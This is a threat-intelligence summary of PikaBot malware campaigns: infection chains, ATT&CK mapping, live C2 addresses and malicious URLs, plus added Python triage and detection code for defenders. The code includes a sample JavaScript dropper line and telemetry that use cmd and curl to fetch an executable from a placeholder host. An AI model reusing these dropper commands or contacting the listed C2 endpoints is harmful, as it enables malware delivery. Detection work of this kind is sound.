Distinctive Evolution of Pikabot Malware: Insights from McAfee Blog

PikaBot is a modular backdoor active since early 2023 that uses a loader and core module, performs process injection into legitimate processes, and communicates with C2 servers over HTTPS on non-standard ports. Its distribution mirrors Qakbot-style campaigns, relying on geographically targeted email spam, SMB file shares, and multiple attachment types (HTML, JS, Excel, JAR) to deliver payloads. #PikaBot #Qakbot #MonikerLink #Outlook #SMB

Key points

  • PikaBot is a modular backdoor composed of a loader and a core module that injects into legitimate processes.
  • The malware primarily spreads via targeted email spam campaigns that link to SMB shares hosting malicious zip files.
  • Observed campaigns use diverse attachment types: HTML (meta-refresh), JavaScript (executes curl/cmd), SMB links, Excel (embedded SMB hyperlinks), and JAR files.
  • Infection chains vary by campaign (e.g., .zip → .js → curl → .exe; .zip → .jar → .dll; .zip → .xls → .js → .dll), often executing payloads via regsvr32.exe.
  • The loader allocates memory, decrypts a bundled PE, and the core injects into ctfmon.exe; a hardcoded mutex prevents double infection.
  • Network activity uses HTTPS over non-traditional ports (examples: 2221, 2078) to communicate with C2 servers.
  • IOCs published include multiple SHA-256 hashes for zip/html/js/exe/jar/dll samples and specific C2 IP:port entries.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Initial access via targeted spam emails with malicious attachments or links ((‘PikaBot, along with various other malicious loaders … heavily depends on email spam campaigns for distribution.’)).
  • [T1204.002] User Execution: Malicious File – The victim opens an attached HTML file whose meta refresh redirects the browser to a file:// (SMB) URL, forcing client-side retrieval of the next stage ((‘meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’’)).
  • [T1021.002] Remote Services: SMB/Windows Admin Shares – Payloads are staged on external SMB shares that victims reach through file:// links in mail or Office documents, including an Outlook MonikerLink-style link embedded directly in the message ((‘these emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files’ and ‘attaches an SMB link in the Outlook mail itself.’)).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – JS files spawn cmd.exe and curl.exe to create directories and download payloads ((‘triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.’)).
  • [T1218.010] Signed Binary Proxy Execution: regsvr32.exe – Execution of downloaded DLL payloads via regsvr32.exe to load malicious code ((‘The downloaded DLL payload is executed by regsvr32.exe.’)).
  • [T1055] Process Injection – Core module injects decrypted PE into a legitimate process (ctfmon.exe) using code injection ((‘employs a code injector to decrypt and inject the core module into a legitimate process’ and ‘injects the malicious content in ctfmon.exe’)).
  • [T1027] Obfuscated Files or Information (Packing/Encryption) – Loader uses custom decryption loop and high-entropy packed resources to conceal the embedded PE ((‘relatively high entropy of the resource section … employs a custom decryption loop to decrypt the data, resulting in a PE file’)).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication over HTTPS ((‘PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).’)).
  • [T1043] Commonly Used Port (deprecated in current ATT&CK; the behaviour now maps to T1571 Non-Standard Port) – Use of non-standard ports for HTTPS so C2 traffic does not match port-based expectations ((‘over HTTPS on non-traditional ports (2221, 2078, etc).’)).

Indicators of Compromise

  • [IP:Port C2] Command-and-control servers observed – 178.18.246.136:2078, 86.38.225.106:2221, and 57.128.165.176:1372
  • [File hashes] Sample SHA-256 examples (payloads and droppers) – 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a (ZIP), 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9 (EXE), and 10 more hashes
  • [Domains/URLs/SMB] Malicious file locations and links used in campaigns – file://newssocialwork.com/public/FNFY.zip, file:///85.195.115.20/sharereports_02.15.2024_1.js, and hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat
  • [File names / artifacts] Notable payload or artifact names – nh.jpg (DLL payload renamed), and dropped payloads in %TEMP% like ‘163520’ extracted as .png before execution

PikaBot campaigns deliver a range of malicious artifacts and rely on user interaction to start retrieval and execution of the payload. Attackers used specially crafted spam emails pointing to SMB shares or carrying compressed attachments; examples include HTML files that perform a meta refresh to file:// URLs, JavaScript files that spawn cmd.exe and curl.exe to download executables, Excel sheets that embed SMB hyperlinks to .js files, and JAR archives that drop DLLs into %TEMP% for execution. Infection chains observed include: .zip → .js → curl → .exe, .zip → .xls → .js → .dll (executed via regsvr32.exe), and .zip → .jar → .dll (the JAR drops a resource renamed as .png, which is then executed).
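Static triage of the three lure formats just described, as an added example that is not part of the McAfee write-up: it parses an HTML attachment for a meta refresh to a file:// URL, a JavaScript dropper for cmd.exe/curl.exe invocation, and an Excel workbook's OOXML relationship parts for external file:// hyperlink targets. The sample HTML, JS and workbook are constructed inline with a placeholder host (203.0.113.10) and paths; they are not campaign artifacts.

```python
"""Static triage of PikaBot-style delivery artifacts (added example, not McAfee's code)."""
import io
import re
import zipfile
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

FILE_URL = re.compile(r"file:/{2,3}[^\s'\"<>]+", re.IGNORECASE)


class MetaRefreshParser(HTMLParser):
    """Collects url= targets from <meta http-equiv="refresh" content="0;url=..."> tags."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.IGNORECASE)
            if m:
                self.targets.append(m.group(1).strip())


def scan_html(data: str) -> list[str]:
    """Return file:// targets reached via meta refresh (the HTML lure technique)."""
    p = MetaRefreshParser()
    p.feed(data)
    return [t for t in p.targets if t.lower().startswith("file:")]


def scan_js(data: str) -> list[str]:
    """Return suspicious indicators in a JS dropper: shell spawning and curl downloads."""
    hits = []
    if re.search(r"\bcmd(\.exe)?\b", data, re.IGNORECASE):
        hits.append("spawns cmd.exe")
    if re.search(r"\bcurl(\.exe)?\b", data, re.IGNORECASE):
        hits.append("downloads with curl.exe")
    if re.search(r"WScript\.Shell", data, re.IGNORECASE):
        hits.append("uses WScript.Shell")
    return hits


def scan_xlsx(blob: bytes) -> list[str]:
    """Return external file:// targets from every .rels part of an OOXML workbook.

    Excel stores sheet hyperlinks as relationships; an SMB hyperlink appears as
    <Relationship TargetMode="External" Target="file://host/share/x.js" .../>.
    """
    ns = "{http://schemas.openxmlformats.org/package/2006/relationships}"
    found = []
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(ns + "Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and FILE_URL.match(target):
                    found.append(f"{name}: {target}")
    return found


# --- constructed samples (placeholder host/paths, not real campaign artifacts) ---
SAMPLE_HTML = ('<html><head><meta http-equiv="refresh" '
               'content="0;url=file://203.0.113.10/share/payload.txt"></head></html>')
SAMPLE_JS = ('var sh = new ActiveXObject("WScript.Shell"); '
             'sh.Run("cmd /c mkdir C:\\\\stage && curl -o C:\\\\stage\\\\a.exe '
             'http://203.0.113.10/a.dat", 0);')


def build_sample_xlsx() -> bytes:
    """Build a minimal OOXML zip with one sheet relationship pointing at an SMB share."""
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
            '2006/relationships/hyperlink" Target="file://203.0.113.10/share/report.js" '
            'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
    return buf.getvalue()


def triage_all() -> dict:
    return {"html": scan_html(SAMPLE_HTML),
            "js": scan_js(SAMPLE_JS),
            "xlsx": scan_xlsx(build_sample_xlsx())}


if __name__ == "__main__":
    for kind, hits in triage_all().items():
        print(kind, hits)
```

The workbook check looks at every .rels part rather than only the worksheet relationships, because the same External/file:// pattern can be planted in other parts of the package.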

On the host, the loader exhibits a high-entropy packed resource section, allocates memory with VirtualAlloc, and runs a custom decryption loop to produce an in-memory PE. The decrypted core is executed and injected into a legitimate process (ctfmon.exe) launched with a specific command-line argument; the sample also creates a hardcoded mutex ({9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524}) to avoid double infection. Execution techniques include regsvr32-based DLL loading and process injection to run malicious code inside a trusted process.
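An analyst's first check on such a loader is per-section entropy. The following is an added example, not McAfee's tooling: it walks the PE section table with struct alone and flags sections whose Shannon entropy exceeds a threshold. Because no real sample can be bundled here, the block builds a synthetic PE in memory with a low-entropy .text and a pseudo-random .rsrc standing in for the encrypted embedded payload; the 7.2 bits/byte threshold and the synthetic image are assumptions of the example.

```python
"""Per-section entropy triage for a packed loader (added example, not McAfee's code)."""
import math
import random
import struct

ENTROPY_FLAG = 7.2  # bits/byte (assumed cut-off); code is usually < 6.5, encrypted/compressed data ~7.9


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty input, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(blob: bytes) -> list[dict]:
    """DOS header -> PE signature -> COFF header -> section table; return name and raw bytes per section."""
    if blob[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", blob, coff + 2)[0]      # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]      # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = coff + 20 + opt_size
    out = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        name, _vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", blob, table + 40 * i)
        out.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                    "raw": blob[rawptr:rawptr + rawsize]})
    return out


def section_entropy_report(blob: bytes) -> list[tuple[str, float, bool]]:
    """(section name, entropy rounded to 2 dp, flagged) for every section."""
    rep = []
    for s in pe_sections(blob):
        h = shannon_entropy(s["raw"])
        rep.append((s["name"], round(h, 2), h >= ENTROPY_FLAG))
    return rep


def build_synthetic_pe() -> bytes:
    """Construct a minimal PE: low-entropy .text plus a pseudo-random .rsrc (stand-in for an encrypted payload)."""
    rng = random.Random(1337)                                      # deterministic "encrypted" bytes
    text = b"\x55\x8b\xec\x90" * 256 + b"\xc3" + b"\x00" * 1023    # prologue stub + padding, 2048 bytes
    rsrc = bytes(rng.getrandbits(8) for _ in range(4096))
    sections = [(b".text", text), (b".rsrc", rsrc)]
    opt_size = 0                                                   # no optional header needed for the section walk
    header_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)     # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    table, body, raw_ptr, va = b"", b"", header_len, 0x1000
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va, len(data),
                             raw_ptr, 0, 0, 0, 0, 0x40000040)
        body += data
        raw_ptr += len(data)
        va += 0x1000
    return dos + b"PE\0\0" + coff + table + body


if __name__ == "__main__":
    for name, h, flagged in section_entropy_report(build_synthetic_pe()):
        print(f"{name:8s} entropy={h:.2f}{'  <-- possible packed/encrypted payload' if flagged else ''}")
```

Run it against a real loader by passing the file bytes to section_entropy_report; the .rsrc section standing out against .text is the pattern the write-up describes.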

Network behavior shows encrypted C2 communications over HTTPS on non-standard ports (examples: 2221, 2078), with multiple IP:port endpoints embedded in the payloads. Defenders should monitor for connections to the listed C2 endpoints (and, more broadly, TLS on ports such as 2221 and 2078 from non-browser processes), the provided SHA-256 sample hashes, file:// (SMB) links in e-mail bodies, HTML attachments and Office relationship parts, regsvr32.exe loading files with non-DLL extensions such as nh.jpg or a .png from %TEMP%, script hosts (wscript.exe) spawning cmd.exe or curl.exe, and java.exe launching regsvr32.exe.
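The monitoring points above expressed as simple rules over process-creation and network events, as an added example that is not from the McAfee post. The events are constructed Sysmon-style records with placeholder hosts and paths; the known C2 set is the three IP:port pairs listed under Indicators of Compromise, and the assumptions that .js attachments run under wscript.exe and that ctfmon.exe is the injected process follow from the text above.

```python
"""Process-chain and network heuristics for the PikaBot chains described above (added example)."""
import re
from typing import Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
JAVA_HOSTS = {"java.exe", "javaw.exe"}
C2_ENDPOINTS = {("178.18.246.136", 2078), ("86.38.225.106", 2221), ("57.128.165.176", 1372)}  # IOCs above
ODD_TLS_PORTS = {2078, 2221}                       # HTTPS ports named in the write-up
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def regsvr32_target(cmdline: str) -> Optional[str]:
    """Module path from a regsvr32 command line, skipping /s /n /i: style switches."""
    for a in re.findall(r'"[^"]+"|\S+', cmdline)[1:]:
        if a.startswith("/") or a.startswith("-"):
            continue
        return a.strip('"')
    return None


def evaluate(events: list[dict]) -> list[str]:
    """R1 script host -> cmd/curl; R2 java -> regsvr32; R3 regsvr32 on non-DLL or %TEMP% file;
    R4 known C2 endpoint or HTTPS on an odd port from a non-browser process."""
    alerts = []
    for e in events:
        if e["type"] == "process":
            parent, child = basename(e["parent"]), basename(e["image"])
            if parent in SCRIPT_HOSTS and child in {"cmd.exe", "curl.exe"}:
                alerts.append(f"R1 {parent} -> {child}: {e['cmdline']}")
            if parent in JAVA_HOSTS and child == "regsvr32.exe":
                alerts.append(f"R2 {parent} -> regsvr32.exe: {e['cmdline']}")
            if child == "regsvr32.exe":
                target = regsvr32_target(e["cmdline"])
                if target:
                    ext = target.lower().rsplit(".", 1)[-1] if "." in target else ""
                    in_temp = "\\temp\\" in target.lower()
                    if ext not in {"dll", "ocx"} or in_temp:
                        alerts.append(f"R3 regsvr32 loading {target}")
        elif e["type"] == "network":
            proc = basename(e["image"])
            if (e["dst_ip"], e["dst_port"]) in C2_ENDPOINTS:
                alerts.append(f"R4 known C2 {e['dst_ip']}:{e['dst_port']} from {proc}")
            elif e["dst_port"] in ODD_TLS_PORTS and proc not in BROWSERS:
                alerts.append(f"R4 HTTPS on non-standard port {e['dst_port']} from {proc}")
    return alerts


# Constructed sample telemetry (placeholder paths/hosts); the last process event and the
# browser connection are benign controls that must not fire.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd /c mkdir C:\stage"},
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -o C:\stage\a.exe http://203.0.113.10/x.dat"},
    {"type": "process", "parent": r"C:\Program Files\Java\bin\java.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Users\u\AppData\Local\Temp\163520.png"'},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Users\u\Downloads\nh.jpg"'},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
    {"type": "network", "image": r"C:\Windows\System32\ctfmon.exe",
     "dst_ip": "178.18.246.136", "dst_port": 2078},
    {"type": "network", "image": r"C:\Windows\System32\ctfmon.exe",
     "dst_ip": "198.51.100.7", "dst_port": 2221},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "dst_ip": "198.51.100.8", "dst_port": 443},
]

if __name__ == "__main__":
    for line in evaluate(SAMPLE_EVENTS):
        print(line)
```

R3 deliberately keys on the file, not the parent, so the .xls → .js → regsvr32 chain (where the parent is wscript.exe rather than java.exe) still fires on nh.jpg; R4's port rule is a hunting signal and should be paired with process context before paging anyone.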

Read more: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/distinctive-campaign-evolution-of-pikabot-malware/